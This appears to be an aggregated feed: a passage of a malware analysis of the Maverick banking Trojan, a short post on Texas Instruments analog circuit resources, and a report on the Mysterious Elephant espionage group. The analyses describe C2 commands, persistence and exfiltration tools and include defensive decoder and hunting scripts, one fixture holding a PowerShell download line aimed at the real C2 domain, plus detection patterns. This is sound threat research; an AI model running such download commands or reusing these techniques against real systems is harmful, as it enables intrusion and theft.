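    """Repeating-key XOR. XOR is its own inverse, so one routine encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decrypt_stage(blob: bytes) -> bytes:
    """Recover the Donut shellcode from a blob as returned by the C2."""
    payload, key = split_trailer(blob)
    return xor_with_key(payload, key)


def encrypt_stage(payload: bytes, key: bytes) -> bytes:
    """Build a blob in the same layout; used here only to construct test input."""
    return xor_with_key(payload, key) + key + struct.pack("<i", len(key))


# Constructed sample: a fake payload and key, not bytes from the real campaign.
SAMPLE_KEY = b"MaverickXorKey!!"
SAMPLE_PAYLOAD = b"MZ\x90\x00" + bytes(range(60))
SAMPLE_BLOB = encrypt_stage(SAMPLE_PAYLOAD, SAMPLE_KEY)

if __name__ == "__main__":
    out = decrypt_stage(SAMPLE_BLOB)
    print(out == SAMPLE_PAYLOAD, out[:4])
```

The plausibility check on the key size matters when feeding the decoder arbitrary files pulled from a sandbox: a truncated download or an HTTP error page would otherwise yield a negative or oversized key length and a silently wrong result.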


WhatsApp infector downloader


After the second Donut shellcode is decrypted and started, it will load another downloader using the same obfuscation method as the previous one. It behaves similarly, but this time it will download a PE file instead of a Donut shellcode. This PE file is another .NET assembly that will be loaded into the process as a module.

One of the namespaces used by this .NET executable is named “Maverick.StageOne,” which is considered by the attacker to be the first one to be loaded. This download stage is used exclusively to download the WhatsApp infector in the same way as the previous stage. The main difference is that this time, it is not an encrypted Donut shellcode, but another .NET executable—the WhatsApp infector—which will be used to hijack the victim’s account and use it to spam their contacts in order to spread itself.

This module, which is also obfuscated, is the WhatsApp infector and is the final payload of this branch of the infection chain. It includes a script from WPPConnect, an open-source WhatsApp automation project, as well as a Selenium browser-automation executable used to drive the browser.

The executable’s namespace name is “ZAP”, a very common word in Brazil to refer to WhatsApp. These files use almost the same obfuscation techniques as the previous examples, but the method’s variable names remain in the source code. The main behavior of this stage is to locate the WhatsApp window in the browser and use WPPConnect to instrument it, causing the infected victim to send messages to their contacts and thus spread again. The file sent depends on the “MaverickBot” executable, which will be discussed in the next section.

Maverick, the banking Trojan


The Maverick Banker comes from a different execution branch than the WhatsApp infector: it is the payload of the other Donut shellcode, and no additional download steps are needed to execute it. This is the main payload of the campaign and embeds another encrypted executable named “Maverick Agent”, which performs the extended activity on the machine, such as contacting the C2 and keylogging. It is described in the next section.

When Maverick Banker first loads, it attempts to register persistence via the Startup folder. It first checks whether persistence already exists: it looks for a .bat file in the “Startup” directory and, beyond mere existence, pattern-matches the file’s contents for the string “for %%”, which is part of the initial loading process. If no such file exists, it generates a new “GUID”, removes its first 6 characters, and stores the persistence batch script as:

  • “C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\” + “HealthApp-” + GUID + “.bat”.

Next, it will generate the bat command using the hardcoded URL, which in this case is:

  • “hxxps://sorvetenopote.com” + “/api/itbi/startup/” + NEW_GUID.

In the command generation function, it is possible to see the creation of an entirely new obfuscated PowerShell script.

First, it creates a variable named “$URL” and assigns it the content passed as a parameter, creates a “Net.WebClient” object, and calls “DownloadString.Invoke($URL)”. Immediately after creating these small commands, it encodes them in base64. Overall the script is fully obfuscated, using functions that automatically and randomly generate PowerShell blocks. The persistence script thus reproduces the bootstrap that the initial LNK file performed to start the infection.

This persistence mechanism seems a bit strange at first glance, as it always depends on the C2 being online. However, it is in fact clever, since the malware would not work without the C2 anyway. Saving only the bootstrap .bat file thus keeps the entire infection in memory. The flip side for defenders is that this .bat file is the one on-disk artefact of the infection, and therefore the thing to hunt for. Once persistence is in place, the banker starts its true function, which is mainly to monitor browsers for banking pages.
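An added hunting script (my own, not the report’s or the malware’s) that applies the indicators from the paragraphs above to the roaming Start Menu folders: a .bat whose name follows the HealthApp-<GUID> pattern, or whose contents carry two or more of the reported markers (“for %%”, “DownloadString”, the C2 domain). The scan of the Programs\Startup subfolder alongside the Programs folder the report names, and treating “FromBase64String” as a marker for the base64-encoded PowerShell the script carries, are my assumptions. The sample directory is constructed inside the script so it runs anywhere.

```python
import os
import re
import tempfile
from pathlib import Path

# The report gives Start Menu\Programs; Programs\Startup is added as an assumption.
_ROAMING = Path(os.environ.get("APPDATA", "")) / "Microsoft" / "Windows" / "Start Menu"
DEFAULT_DIRS = [_ROAMING / "Programs", _ROAMING / "Programs" / "Startup"]

# HealthApp-<GUID with its first 6 characters removed>.bat
NAME_RE = re.compile(r"^HealthApp-[0-9a-fA-F-]+\.bat$")

# "for %%", DownloadString and the domain come from the report; FromBase64String
# is an assumption about how the base64-encoded fragments are consumed.
CONTENT_MARKERS = ("for %%", "DownloadString", "sorvetenopote.com", "FromBase64String")


def score_bat(path: Path) -> dict:
    """Score one batch file: name pattern plus count of content markers."""
    try:
        text = path.read_text(errors="ignore").lower()
    except OSError:
        text = ""
    hits = [m for m in CONTENT_MARKERS if m.lower() in text]
    name_match = bool(NAME_RE.match(path.name))
    return {
        "path": str(path),
        "name_match": name_match,
        "markers": hits,
        # A matching name is enough on its own; otherwise require two markers so a
        # legitimate script that merely downloads something is not flagged.
        "suspicious": name_match or len(hits) >= 2,
    }


def hunt(dirs=DEFAULT_DIRS) -> list[dict]:
    """Return the suspicious .bat files found directly inside the given folders."""
    findings = []
    for d in dirs:
        if not d.is_dir():
            continue
        for p in d.glob("*.bat"):
            result = score_bat(p)
            if result["suspicious"]:
                findings.append(result)
    return findings


def make_constructed_sample() -> Path:
    """Constructed fixtures (not real artefacts): one file with the reported name
    pattern, one benign script, one with the reported content markers."""
    d = Path(tempfile.mkdtemp(prefix="maverick-hunt-"))
    (d / "HealthApp-0df942c983635e.bat").write_text(
        "@echo off\nfor %%a in (x) do powershell -nop -w hidden -e QQBB\n")
    (d / "backup.bat").write_text("@echo off\nxcopy C:\\data D:\\backup /E\n")
    (d / "updater.bat").write_text(
        "powershell -c \"$URL='hxxps://sorvetenopote.com/api/itbi/startup/x';"
        "(New-Object Net.WebClient).DownloadString.Invoke($URL)\"\n")
    return d


if __name__ == "__main__":
    target_dirs = DEFAULT_DIRS if any(d.is_dir() for d in DEFAULT_DIRS) else [make_constructed_sample()]
    for f in hunt(target_dirs):
        print(f["path"], "name_match" if f["name_match"] else "", f["markers"])
```

Because the agent deletes all but the newest HealthApp-*.bat when it finds several, a single match is the expected state on an infected host; collecting the file before remediation preserves the only on-disk record of the C2 URL.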

To determine which web page the victim is viewing, the malware inspects the browsers running on the machine. It takes the current foreground window (the window in focus) and its PID, and from the PID extracts the process name. Monitoring continues only if the victim is using one of the following browsers:

  • Chrome
  • Firefox
  • MS Edge
  • Brave
  • Internet Explorer
  • Specific bank web browser

If one of the browsers listed above is in the foreground, the malware uses UI Automation to extract the title of the currently open tab and matches it against a predefined list of target online banking sites to decide whether to act. The list of target banks is gzip-compressed, encrypted with AES-256, and stored as a base64 string. The AES initialization vector (IV) occupies the first 16 bytes of the decoded base64 data and the key the next 32 bytes; the actual ciphertext begins at offset 48. Because the key and IV travel with the ciphertext, this is obfuscation rather than secrecy: anyone holding the sample can recover the list.

This encryption mechanism is the same one used by Coyote, a banking Trojan also written in .NET and documented by us in early 2024.

If one of these banks is found, the program decrypts another PE file using the same algorithm described in the .NET Loader section of this report and loads it as an assembly, calling its entry point with the name of the open bank as an argument. This new PE is called “Maverick.Agent” and contains most of the banking logic for contacting the C2 and exfiltrating data to it.

Maverick Agent


The agent is the binary that does most of the banker's work. It first checks whether it is running on a machine located in Brazil, using the following checks:

  • IsValidBrazilianTimezone()
    Checks if the current time zone is within the Brazilian time zone range. Brazil has time zones between UTC-5 (-300 min) and UTC-2 (-120 min). If the current time zone is within this range, it returns “true”.
  • IsBrazilianLocale()
    Checks if the current thread’s language or locale is set to Brazilian Portuguese. For example, “pt-BR”, “pt_br”, or any string containing “portuguese” and “brazil”. Returns “true” if the condition is met.
  • IsBrazilianRegion()
    Checks if the system’s configured region is Brazil. It compares region codes like “BR”, “BRA”, or checks if the region name contains “brazil”. Returns “true” if the region is set to Brazil.
  • IsBrazilianDateFormat()
    Checks if the short date format follows the Brazilian standard. The Brazilian format is dd/MM/yyyy. The function checks if the pattern starts with “dd/” and contains “/MM/” or “dd/MM”.

Right after the check, it will enable appropriate DPI support for the operating system and monitor type, ensuring that images are sharp, fit the correct scale (screen zoom), and work well on multiple monitors with different resolutions. Then, it will check for any running persistence, previously created in “C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\”. If more than one file is found, it will delete the others based on “GetCreationTime” and keep only the most recently created one.

C2 communication


Communication uses the WatsonTCP library with SSL tunnels. It utilizes a local encrypted X509 certificate to protect the communication, which is another similarity to the Coyote malware. The connection is made to the host “casadecampoamazonas.com” on port 443. The certificate is exported as encrypted, and the password used to decrypt it is Maverick2025!. After the certificate is decrypted, the client will connect to the server.

For the C2 to work, a specific password must be sent during the first contact. The password used by the agent is “101593a51d9c40fc8ec162d67504e221”. Using this password during the first connection will successfully authenticate the agent with the C2, and it will be ready to receive commands from the operator. The important commands are:

Command | Description
INFOCLIENT | Returns the information of the agent, which is used to identify it on the C2. The information sent is described in the next section.
RECONNECT | Disconnect, sleep for a few seconds, and reconnect to the C2.
REBOOT | Reboot the machine.
KILLAPPLICATION | Exit the malware process.
SCREENSHOT | Take a screenshot and send it to the C2, compressed with gzip.
KEYLOGGER | Enable the keylogger; keystrokes are captured locally and sent only when the server specifically requests the logs.
MOUSECLICK | Perform a mouse click; used for the remote connection.
KEYBOARDONECHAR | Press one character; used for the remote connection.
KEYBOARDMULTIPLESCHARS | Send multiple characters; used for the remote connection.
TOOGLEDESKTOP | Enable the remote connection and send screenshots to the operator whenever the screen changes (it computes a hash of each screenshot to avoid resending the same image).
TOOGLEINTERN | Get a screenshot of a specific window.
GENERATEWINDOWLOCKED | Lock the screen using one of the banks' home pages.
LISTALLHANDLESOPENEDS | Send all open handles to the server.
KILLPROCESS | Kill a process by its handle.
CLOSEHANDLE | Close a handle.
MINIMIZEHANDLE | Minimize a window using its handle.
MAXIMIZEHANDLE | Maximize a window using its handle.
GENERATEWINDOWREQUEST | Generate a phishing window that asks the victim for the credentials used by banks.
CANCELSCREENREQUEST | Close the phishing window.

Agent profile info

In the “INFOCLIENT” command, the information sent to the C2 is as follows:

  • Agent ID: A SHA256 hash of all primary MAC addresses used by all interfaces
  • Username
  • Hostname
  • Operating system version
  • Client version (no value)
  • Number of monitors
  • Home page (home): the bank whose home screen should be used; this is the bank name that the browser monitoring routine passes to the agent when it decrypts and starts it.
  • Screen resolution


Conclusion


According to our telemetry, all victims were in Brazil, but the Trojan has the potential to spread to other countries, as an infected victim can send it to another location. Even so, the malware is designed to target only Brazilians at the moment.
It is evident that this threat is very sophisticated and complex; the entire execution chain is relatively new, but the final payload has many code overlaps and similarities with the Coyote banking Trojan, which we documented in 2024. However, some of the techniques are not exclusive to Coyote and have been observed in other low-profile banking Trojans written in .NET. The agent’s structure is also different from how Coyote operated; it did not use this architecture before.
It is very likely that Maverick is a new banking Trojan using shared code from Coyote, which may indicate that the developers of Coyote have completely refactored and rewritten a large part of their components.
This is one of the most complex infection chains we have ever detected, designed to load a banking Trojan. It has infected many people in Brazil, and its worm-like nature allows it to spread exponentially by exploiting a very popular instant messenger. The impact is enormous. Furthermore, it demonstrates the use of AI in the code-writing process, specifically in certificate decryption, which may also indicate the involvement of AI in the overall code development. Maverick works like any other banking Trojan, but the worrying aspects are its delivery method and its significant impact.
We have detected the entire infection chain since day one, preventing victim infection from the initial LNK file. Kaspersky products detect this threat with the verdicts HEUR:Trojan.Multi.Powenot.a and HEUR:Trojan-Banker.MSIL.Maverick.gen.

IoCs

Domain | IP | ASN
casadecampoamazonas[.]com | 181.41.201.184 | 212238
sorvetenopote[.]com | 77.111.101.169 | 396356

securelist.com/maverick-banker…


More Than 100 Sub-Circuit Designs from Texas Instruments


The Texas Instruments branding with some schematic symbols in background.

We were recently tipped off to quite a resource — on the Texas Instruments website, there’s a page where you can view and download a compendium of analog sub-circuits.

Individual circuits can be downloaded in the form of PDF files. If you choose to register (which is free), you'll also gain access to the pair of e-books listed at the bottom of the page: Analog Engineer's Circuit Cookbook: Amplifiers and Analog Engineer's Circuit Cookbook: Data Converters. The data converter circuits can be further subdivided into analog-to-digital converter (ADC) circuits and digital-to-analog converter (DAC) circuits.

There are more than 60 amplifier circuits including basic circuits, current sensing circuits, signal sources, current sources, filters, non-linear circuits (rectifiers/clamps/peak detectors), signal conditioning, comparators, sensor acquisition, audio, and integrated amplifier circuits using MSP430 microcontrollers.

You’ll also find 39 analog-to-digital converter (ADC) circuits including low-power, small size, and cost optimized circuits; level translation and input drive circuits; low-level sensor input circuits; input protection, filtering and isolation circuits; and commonly used auxiliary circuits. Finally, there are 15 digital-to-analog converter (DAC) circuits including audio outputs, auxiliary and biasing circuits, current sources, and voltage sources.

Thanks to [Lee Leduc] for letting us know over on the EEVblog Forum.


hackaday.com/2025/10/15/more-t…


Mysterious Elephant: a growing threat



Introduction


Mysterious Elephant is a highly active advanced persistent threat (APT) group that we at Kaspersky GReAT discovered in 2023. It has been consistently evolving and adapting its tactics, techniques, and procedures (TTPs) to stay under the radar. With a primary focus on targeting government entities and foreign affairs sectors in the Asia-Pacific region, the group has been using a range of sophisticated tools and techniques to infiltrate and exfiltrate sensitive information. Notably, Mysterious Elephant has been exploiting WhatsApp communications to steal sensitive data, including documents, pictures, and archive files.

The group’s latest campaign, which began in early 2025, reveals a significant shift in their TTPs, with an increased emphasis on using new custom-made tools as well as customized open-source tools, such as BabShell and MemLoader modules, to achieve their objectives. In this report, we will delve into the history of Mysterious Elephant’s attacks, their latest tactics and techniques, and provide a comprehensive understanding of this threat.

The emergence of Mysterious Elephant


Mysterious Elephant is a threat actor we’ve been tracking since 2023. Initially, its intrusions resembled those of the Confucius threat actor. However, further analysis revealed a more complex picture. We found that Mysterious Elephant’s malware contained code from multiple APT groups, including Origami Elephant, Confucius, and SideWinder, which suggested deep collaboration and resource sharing between teams. Notably, our research indicates that the tools and code borrowed from the aforementioned APT groups were previously used by their original developers, but have since been abandoned or replaced by newer versions. However, Mysterious Elephant has not only adopted these tools, but also continued to maintain, develop, and improve them, incorporating the code into their own operations and creating new, advanced versions. The actor’s early attack chains featured distinctive elements, such as remote template injections and exploitation of CVE-2017-11882, followed by the use of a downloader called “Vtyrei”, which was previously connected to Origami Elephant and later abandoned by this group. Over time, Mysterious Elephant has continued to upgrade its tools and expanded its operations, eventually earning its designation as a previously unidentified threat actor.

Latest campaign


The group’s latest campaign, which was discovered in early 2025, reveals a significant shift in their TTPs. They are now using a combination of exploit kits, phishing emails, and malicious documents to gain initial access to their targets. Once inside, they deploy a range of custom-made and open-source tools to achieve their objectives. In the following sections, we’ll delve into the latest tactics and techniques used by Mysterious Elephant, including their new tools, infrastructure, and victimology.

Spear phishing


Mysterious Elephant has started using spear phishing techniques to gain initial access. Phishing emails are tailored to each victim and are convincingly designed to mimic legitimate correspondence. The primary targets of this APT group are countries in the South Asia (SA) region, particularly Pakistan. Notably, this APT organization shows a strong interest and inclination towards diplomatic institutions, which is reflected in the themes covered by the threat actor’s spear phishing emails, as seen in bait attachments.

Spear phishing email used by Mysterious Elephant

For example, the decoy document above concerns Pakistan’s application for a non-permanent seat on the United Nations Security Council for the 2025–2026 term.

Malicious tools


Mysterious Elephant’s toolkit is a noteworthy aspect of their operations. The group has switched to using a variety of custom-made and open-source tools instead of employing known malware to achieve their objectives.

PowerShell scripts


The threat actor uses PowerShell scripts to execute commands, deploy additional payloads, and establish persistence. These scripts are loaded from C2 servers and often use legitimate system administration tools, such as curl and certutil, to download and execute malicious files.

Malicious PowerShell script seen in Mysterious Elephant's 2025 attacks

For example, the script above is used to download the next-stage payload and save it as ping.exe. It then schedules a task to execute the payload and send the results back to the C2 server. The task is set to run automatically in response to changes in the network profile, ensuring persistence on the compromised system. Specifically, it is triggered by network profile-related events (Microsoft-Windows-NetworkProfile/Operational), which can indicate a new network connection. A four-hour delay is configured after the event, likely to help evade detection.
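As an added example (not from the report), the following Go program checks an exported Task Scheduler definition for the persistence pattern described above: an EventTrigger subscribed to Microsoft-Windows-NetworkProfile/Operational, the configured delay, and the command the task runs. The task XML is constructed for the example; the ping.exe path and the event ID in it are placeholders, not values from the report.

```go
package main

import (
	"encoding/xml"
	"fmt"
	"strings"
)

// Minimal view of the Task Scheduler XML ("schtasks /query /xml" output); only the elements this check reads are declared.
type taskXML struct {
	Triggers struct {
		Event []struct {
			Subscription string `xml:"Subscription"`
			Delay        string `xml:"Delay"`
		} `xml:"EventTrigger"`
	} `xml:"Triggers"`
	Actions struct {
		Exec []struct {
			Command string `xml:"Command"`
		} `xml:"Exec"`
	} `xml:"Actions"`
}

// Finding records why a task matches: the event subscription, its delay in minutes, and the commands it runs.
type Finding struct {
	Subscription string
	DelayMinutes int
	Commands     []string
}

// delayMinutes converts a Task Scheduler delay such as "PT4H" or "PT30M" to minutes; seconds and unparsable input count as 0.
func delayMinutes(d string) int {
	total, n := 0, 0
	for _, c := range strings.TrimPrefix(d, "PT") {
		switch {
		case c >= '0' && c <= '9':
			n = n*10 + int(c-'0')
		case c == 'H':
			total, n = total+n*60, 0
		case c == 'M':
			total, n = total+n, 0
		default:
			n = 0
		}
	}
	return total
}

// InspectTask parses one task definition (UTF-8 text) and returns a Finding when any event trigger subscribes to the NetworkProfile/Operational log, else nil.
func InspectTask(doc string) (*Finding, error) {
	if strings.HasPrefix(doc, "<?xml") { // exports declare UTF-16; drop the prolog so the parser accepts UTF-8 text
		doc = doc[strings.Index(doc, "?>")+2:]
	}
	var t taskXML
	if err := xml.Unmarshal([]byte(doc), &t); err != nil {
		return nil, err
	}
	for _, ev := range t.Triggers.Event {
		if !strings.Contains(ev.Subscription, "Microsoft-Windows-NetworkProfile/Operational") {
			continue
		}
		f := &Finding{Subscription: ev.Subscription, DelayMinutes: delayMinutes(ev.Delay)}
		for _, a := range t.Actions.Exec { f.Commands = append(f.Commands, a.Command) }
		return f, nil
	}
	return nil, nil
}

// SampleTask is a constructed definition modelled on the report; the payload path and event ID are placeholders.
const SampleTask = `<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><EventTrigger><Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="Microsoft-Windows-NetworkProfile/Operational"&gt;&lt;Select Path="Microsoft-Windows-NetworkProfile/Operational"&gt;*[System[EventID=10000]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription><Delay>PT4H</Delay></EventTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>C:\Users\Public\ping.exe</Command></Exec></Actions>
</Task>`

func main() {
	f, err := InspectTask(SampleTask)
	fmt.Printf("%+v %v\n", f, err)
}
```

Real exports from schtasks are UTF-16; convert them to UTF-8 before handing the text to InspectTask.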

BabShell


One of the most recent tools used by Mysterious Elephant is BabShell. This is a reverse shell tool written in C++ that enables attackers to connect to a compromised system. Upon execution, it gathers system information, including username, computer name, and MAC address, to identify the machine. The malware then enters an infinite loop of performing the following steps:

  1. It listens for and receives commands from the attacker-controlled C2 server.
  2. For each received command, BabShell creates a separate thread to execute it, allowing for concurrent execution of multiple commands.
  3. The output of each command is captured and saved to a file named output_[timestamp].txt, where [timestamp] is the current time. This allows the attacker to review the results of the commands.
  4. The contents of the output_[timestamp].txt file are then transmitted back to the C2 server, providing the attacker with the outcome of the executed commands and enabling them to take further actions, for instance, deploy a next-stage payload or execute additional malicious instructions.

BabShell uses the following commands to execute command-line instructions and additional payloads it receives from the server:


Customized open-source tools


One of the latest modules used by Mysterious Elephant and loaded by BabShell is MemLoader HidenDesk.

MemLoader HidenDesk is a reflective PE loader that loads and executes malicious payloads in memory. It uses encryption and compression to evade detection.

MemLoader HidenDesk operates in the following manner:

  1. The malware checks the number of active processes and terminates itself if there are fewer than 40 processes running — a technique used to evade sandbox analysis.
  2. It creates a shortcut to its executable and saves it in the autostart folder, ensuring it can restart itself after a system reboot.
  3. The malware then creates a hidden desktop named “MalwareTech_Hidden” and switches to it, providing a covert environment for its activities. This technique is borrowed from an open-source project on GitHub.
  4. Using an RC4-like algorithm with the key D12Q4GXl1SmaZv3hKEzdAhvdBkpWpwcmSpcD, the malware decrypts a block of data from its own binary and executes it in memory as a shellcode. The shellcode’s sole purpose is to load and execute a PE file, specifically a sample of the commercial RAT called “Remcos” (MD5: 037b2f6233ccc82f0c75bf56c47742bb).

Another recent loader malware used in the latest campaign is MemLoader Edge.

MemLoader Edge is a malicious loader that embeds a sample of the VRat backdoor, utilizing encryption and evasion techniques.

It operates in the following manner:

  1. The malware performs a network connectivity test by attempting to connect to the legitimate website bing.com on port 445, which is likely to fail since port 445 is not open on the server side. If the test were to succeed, suggesting that the loader is running in an emulation or sandbox environment, the malware would drop an embedded picture on the machine, display a popup window with three unresponsive mocked-up buttons, and then enter an infinite loop. This is done to complicate detection and analysis.
  2. If the connection attempt fails, the malware iterates through a 1016-byte array to find the correct XOR keys for decrypting the embedded PE file in two rounds. The process continues until the decrypted data matches the byte sequence of MZ\x90, indicating that the real XOR keys are found within the array.
  3. If the malware is unable to find the correct XOR keys, it will display the same picture and popup window as before, followed by a message box containing an error message after the window is closed.
  4. Once the PE file is successfully decrypted, it is loaded into memory using reflective loading techniques. The decrypted PE file is based on the open-source RAT vxRat, which is referred to as VRat due to the PDB string found in the sample:
    C:\Users\admin\source\repos\vRat_Client\Release\vRat_Client.pdb


WhatsApp-specific exfiltration tools


Spying on WhatsApp communications is a key aspect of the exfiltration modules employed by Mysterious Elephant. They are designed to steal sensitive data from compromised systems. The attackers have implemented WhatsApp-specific features into their exfiltration tools, allowing them to target files shared through the WhatsApp application and exfiltrate valuable information, including documents, pictures, archive files, and more. These modules employ various techniques, such as recursive directory traversal, XOR decryption, and Base64 encoding, to evade detection and upload the stolen data to the attackers’ C2 servers.

  • Uplo Exfiltrator

The Uplo Exfiltrator is a data exfiltration tool that targets specific file types and uploads them to the attackers’ C2 servers. It uses a simple XOR decryption to deobfuscate C2 domain paths and employs a recursive depth-first directory traversal algorithm to identify valuable files. The malware specifically targets file types that are likely to contain potentially sensitive data, including documents, spreadsheets, presentations, archives, certificates, contacts, and images. The targeted file extensions include .TXT, .DOC, .DOCX, .PDF, .XLS, .XLSX, .CSV, .PPT, .PPTX, .ZIP, .RAR, .7Z, .PFX, .VCF, .JPG, .JPEG, and .AXX.

  • Stom Exfiltrator

The Stom Exfiltrator is a commonly used exfiltration tool that recursively searches specific directories, including the “Desktop” and “Downloads” folders, as well as all drives except the C drive, to collect files with predefined extensions. Its latest variant is specifically designed to target files shared through the WhatsApp application. This version uses a hardcoded folder path to locate and exfiltrate such files:
%AppData%\\Packages\\xxxxx.WhatsAppDesktop_[WhatsApp ID]\\LocalState\\Shared\\transfers\\

The targeted file extensions include .PDF, .DOCX, .TXT, .JPG, .PNG, .ZIP, .RAR, .PPTX, .DOC, .XLS, .XLSX, .PST, and .OST.

  • ChromeStealer Exfiltrator

The ChromeStealer Exfiltrator is another exfiltration tool used by Mysterious Elephant that targets Google Chrome browser data, including cookies, tokens, and other sensitive information. It searches specific directories within the Chrome user data of the most recently used Google Chrome profile, including the IndexedDB directory and the "Local Storage" directory. The malware uploads all files found in these directories to the attacker-controlled C2 server, potentially exposing sensitive data like chat logs, contacts, and authentication tokens. The response from the C2 server suggests that this tool was also aimed at stealing files related to WhatsApp. The ChromeStealer Exfiltrator employs string obfuscation to evade detection.

Infrastructure


Mysterious Elephant’s infrastructure is a network of domains and IP addresses. The group has been using a range of techniques, including wildcard DNS records, to generate unique domain names for each request. This makes it challenging for security researchers to track and monitor their activities. The attackers have also been using virtual private servers (VPS) and cloud services to host their infrastructure. This allows them to easily scale and adapt their operations to evade detection. According to our data, this APT group has utilized the services of numerous VPS providers in their operations. Nevertheless, our analysis of the statistics has revealed that Mysterious Elephant appears to have a preference for certain VPS providers.

VPS providers most commonly used by Mysterious Elephant

Victimology


Mysterious Elephant’s primary targets are government entities and foreign affairs sectors in the Asia-Pacific region. The group has been focusing on Pakistan, Bangladesh, and Sri Lanka, with a lower number of victims in other countries. The attackers have been using highly customized payloads tailored to specific individuals, highlighting their sophistication and focus on targeted attacks.

The group’s victimology is characterized by a high degree of specificity. Attackers often use personalized phishing emails and malicious documents to gain initial access. Once inside, they employ a range of tools and techniques to escalate privileges, move laterally, and exfiltrate sensitive information.

  • Most targeted countries: Pakistan, Bangladesh, Afghanistan, Nepal and Sri Lanka


Countries targeted most often by Mysterious Elephant

  • Primary targets: government entities and foreign affairs sectors


Industries most targeted by Mysterious Elephant

Conclusion


In conclusion, Mysterious Elephant is a highly sophisticated and active Advanced Persistent Threat group that poses a significant threat to government entities and foreign affairs sectors in the Asia-Pacific region. Through their continuous evolution and adaptation of tactics, techniques, and procedures, the group has demonstrated the ability to evade detection and infiltrate sensitive systems. The use of custom-made and open-source tools, such as BabShell and MemLoader, highlights their technical expertise and willingness to invest in developing advanced malware.

The group’s focus on targeting specific organizations, combined with their ability to tailor their attacks to specific victims, underscores the severity of the threat they pose. The exfiltration of sensitive information, including documents, pictures, and archive files, can have significant consequences for national security and global stability.

To counter the Mysterious Elephant threat, it is essential for organizations to implement robust security measures, including regular software updates, network monitoring, and employee training. Additionally, international cooperation and information sharing among cybersecurity professionals, governments, and industries are crucial in tracking and disrupting the group’s activities.

Ultimately, staying ahead of Mysterious Elephant and other APT groups requires a proactive and collaborative approach to cybersecurity. By understanding their TTPs, sharing threat intelligence, and implementing effective countermeasures, we can reduce the risk of successful attacks and protect sensitive information from falling into the wrong hands.

Indicators of compromise

File hashes



Domains/IPs




securelist.com/mysterious-elep…